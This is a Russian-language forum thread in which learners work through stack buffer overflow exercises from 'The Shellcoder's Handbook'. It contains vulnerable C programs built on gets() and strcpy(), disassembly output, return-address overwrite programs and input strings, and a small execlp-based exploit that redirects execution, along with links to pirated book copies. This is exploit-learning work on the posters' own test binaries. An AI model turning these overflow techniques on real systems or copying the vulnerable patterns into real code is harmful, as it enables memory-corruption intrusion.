Итак, купил вумную книжку "The Shellcoders Handbook: Discovering and Exploiting Security Holes". Пытаюсь разобраться с примерами из книжки на практике. Возникла проблема с первым же примером.


void return_input()
{
char array[30];
gets(array);
printf("%s\n", array);
}

main()
{
return_input();
return 0;
}


Хочу вызвать функцию return_input() дважды, при помощи gdb узнаю её адрес "0x8048594".

Потом (если я прав), смотрю результат дизассемблирования функции return_input(), для того, чтобы понять сколько места резервируется в стеке, вижу:

0x08048594 <return_input+0>: push %ebp
0x08048595 <return_input+1>: mov %esp,%ebp
0x08048597 <return_input+3>: sub $0x28,%esp
0x0804859a <return_input+6>: sub $0xc,%esp
0x0804859d <return_input+9>: lea 0xffffffd8(%ebp),%eax

....


Если я прав, то мне нужно число 0x28 (40 в 10й системе) и к этому числу надо прибавить 8, для того чтобы переписать указатели ebp и eip. Или мне нужно (0x28+0xC)+8??

В общем пишу программулинку, которая тупо переписывала бы адреса:

main()
{
int i=0;
char stuffing[48];

for (i=0;i<=44;i+=4)
*(long*)&stuffing[i] = 0x8048594;
puts(stuffing);
}


В итоге когда её выход перенаправляю в уязвимую программу всё равно вижу "Segmentation fault (core dumped)".

Смотрю состояние регистров, ebp переписался значением 0x8048594, а в eip лежит 0x1. Почему? Что я не так делаю?

Если я прав, то мне нужно число 0x28 (40 в 10й системе) и к этому числу надо прибавить 8, для того чтобы переписать указатели ebp и eip. Или мне нужно (0x28+0xC)+8??
Я проверил. Если ввести 1111111111111111111111111111111111111234 это чудо природы падает с AccessViolation по адресу 0x34333231. Но это, вроде, не 40-й байт, а чуть раньше. Это байты 36-ой, 37-ой, 38-ой и 39-й (если считать с нуля).
(Потрейсил ща олькой и убедился, что это и правда так. У тебя, правда, никсы, но вроде ничего меняться не должно тут)

Даже в таком случае, как я понимаю, eip должен переписаться на нужное мне значение, т.к. я просто переписываю лишнее.

Хм.. ну я составил шеллкод, который вырубает уязвимую программу. (под вин32)

char shellcode[] = "111111111111111111111111111111111111\x34\xff\x13\x 00" "\xe8\xa1\xce\x6d\x7c";

0013FF34 - адрес места в стеке, сразу после этих четырех байт

E8A1CE6D7C - код по адресу 0013FF34 - вызов ExitProcess:
E8 A1CE6D7C CALL kernel32.ExitProcess

а у кого нить в электронке есть эта книга?

Даже в таком случае, как я понимаю, eip должен переписаться на нужное мне значение, т.к. я просто переписываю лишнее.

не было возможности скомпилить сабж, но думается, 4то ты увели4ивая размер входного переполяняемого буфера не только переполняешь его, перезвписав eip, но и затираешь данные, лежащие в кадре стека ниже, в 4ем и при4ина проблем

не было возможности скомпилить сабж, но думается, 4то ты увели4ивая размер входного переполяняемого буфера не только переполняешь его, перезвписав eip, но и затираешь данные, лежащие в кадре стека ниже, в 4ем и при4ина проблем
хз, у меня все прекрасно работает. Переполняется локальный буфер, затирается адрес возврата (на ebp уже плевать) на адрес кода call ExitProcess.
Работает на ура :)
А разве перезапись других данных кадра стека может за собой повлечь такое изменение EIP? че-та я в твою мысль не врубил%)

сплоит: 0000000000000000000000000000000000(Alt+251)(Alt+18 )@
Если у кого есть в электронном варианте скинте плиз, тоже интерестно почитать

Я б тоже почитал. Ни разу ее не видел

_http://slav0nic.xss.ru/books/hack_sec/THE%20SHELLCODER'S%20HANDBOOK.zip

+ сорсы к книге внутри.

2Go0o$E, Спасибо, за книжку...

Кстате немного поигрался, и вот что получилось :), это врядли было задуманно ;)
1└PГь&PН|$$WWPИG∙ш4r-AAAAAAAhiddenN(Alt+255)(Alt+18)

Хмм.. ну а как тогда узнать точно по дизассемблированной функции сколько места в стеке под массив резервируется?


0x08048597 <return_input+3>: sub $0x28,%esp


Почему тут число 0x28 (40), а у вас получается 36 ? Откуда у меня берутся лишние 4 байта?

Когда я начинаю переписывать с 36го байта по 40й, ни eip ни ebp не переписываются.

И ещё вопрос, перенаправил вывод с програмки которая генерирует строку ввода в файл "(./a.out : cat) > 1.txt" В конце файла откудато взялись байты "01 0A", откуда они взялись?

З.Ы.
Книжку я купил на русском языке в магазине "буквоед" в Питере (рядом с м. Площадь Восстания за 830 руб), на озоне вроде тоже продаётся, но блин дорогая.

Ты знаешь, я не знаю откуда ты взял эти значения и темболее не понимяю, как ты помещаешь разницу константы и esp обратно в константу.0x08048597 <return_input+3>: sub $0x28,%espно наверно ты имеешь ввиду этот фрагмент004012D4 >/$ 55 PUSH EBP
004012D5 |. 89E5 MOV EBP, ESP
004012D7 |. 83EC 20 SUB ESP, 20
004012DA |. 57 PUSH EDI
004012DB |. 8D7D E2 LEA EDI, DWORD PTR [EBP-1E]
004012DE |. 57 PUSH EDI ; /s
004012DF |. E8 145F0000 CALL xxx._gets ; \_gets
004012E4 |. 83C4 04 ADD ESP, 4
004012E7 |. 8D7D E2 LEA EDI, DWORD PTR [EBP-1E]
004012EA |. 57 PUSH EDI ; /<%s>
004012EB |. 68 A0A04000 PUSH xxx.0040A0A0 ; |format = "%s",LF,""
004012F0 |. E8 A75C0000 CALL xxx._printf ; \_printf
004012F5 |. 83C4 08 ADD ESP, 8
004012F8 |. 5F POP EDI
004012F9 |. C9 LEAVE
004012FA \. C3 RETв стек помещаются значения кратные 4, так что 30 округляется вперёд до 32(0x20), а вот потерянные 4 байта это какраз ebp, сохранённые в начале функции, которые в свою очередь убераются инструкцией LEAVE.

Ты знаешь, я не знаю откуда ты взял эти значения и темболее не понимяю, как ты помещаешь разницу константы и esp обратно в константу.0x08048597 <return_input+3>: sub $0x28,%esp

Хехе, это другая разновидность синтаксиса ассемблера (AT&T), а ты привык к синтаксису Intel.

GDB поддерживает синтаксис AT&T, а OllyDbg синтаксис Intel. По сути sub $0x28,%esp в записи AT&T эквивалентно sub esp, 28 в Intel.

В синтаксисе AT&T операнды пишутся как "источник, приёмник", а в Intel наоборот + есть ещё кое какие различия.

Ты знаешь, я не знаю откуда ты взял эти значения и темболее не понимяю, как ты помещаешь разницу константы и esp обратно в константу.
это синтаксис AT&T.
в стек помещаются значения кратные 4, так что 30 округляется вперёд до 32(0x20), а вот потерянные 4 байта это какраз ebp, сохранённые в начале функции, которые в свою очередь убераются инструкцией LEAVE.
хм. ну вроде так, угу

в стек помещаются значения кратные 4, так что 30 округляется вперёд до 32(0x20), а вот потерянные 4 байта это какраз ebp,
поместить-то два байта можно в стек (PUSH BX, например), но нужно выравнивать стек по границе машинного слова (32бит)

Прошу разъяснить мне на пальцах. Написал небольшую програмку на си


#include "stdio.h"

void return_input (char *s) {
char array[30];

strcpy(array,s);
printf("%s\n", array);
}

char text () {
printf("text\n");
}

main ( int argc, char *argv[] ) {
text();
return_input(argv[1]);
return 0;

}


И эксплоет

#include "stdlib.h"
main () {
char stuff[]= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x96\x84 \x04\x08";
execlp("./bof","./bof",&stuff,NULL);
}


По адресу 0x08048496 у меня находится вызов функции text()
Работает нормально, т.е вывод

spyder@l33t:~/c> ./eip
text
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA??
text

Теперь хочу передать управление шеллкоду. Вот тут я немогу понять. Где то пишут что нужно передать управление коду jmp esp. Вопрос1 - Где мне взять его, система nix.
Так же пишут что шеллкод нужно передавать сразу после адреса возврата или до него, заполняя остальное место в буфере нопами, в таком случае как узнать адрес куда мне нужно передать управление? Читал статьи, вникнуть немогу
Заранее спасибо

Cылка битая. Вот на русском http://letitbit.net/download/fd46de141051/iskustvo-vzloma-i-zashitu-system.rar.html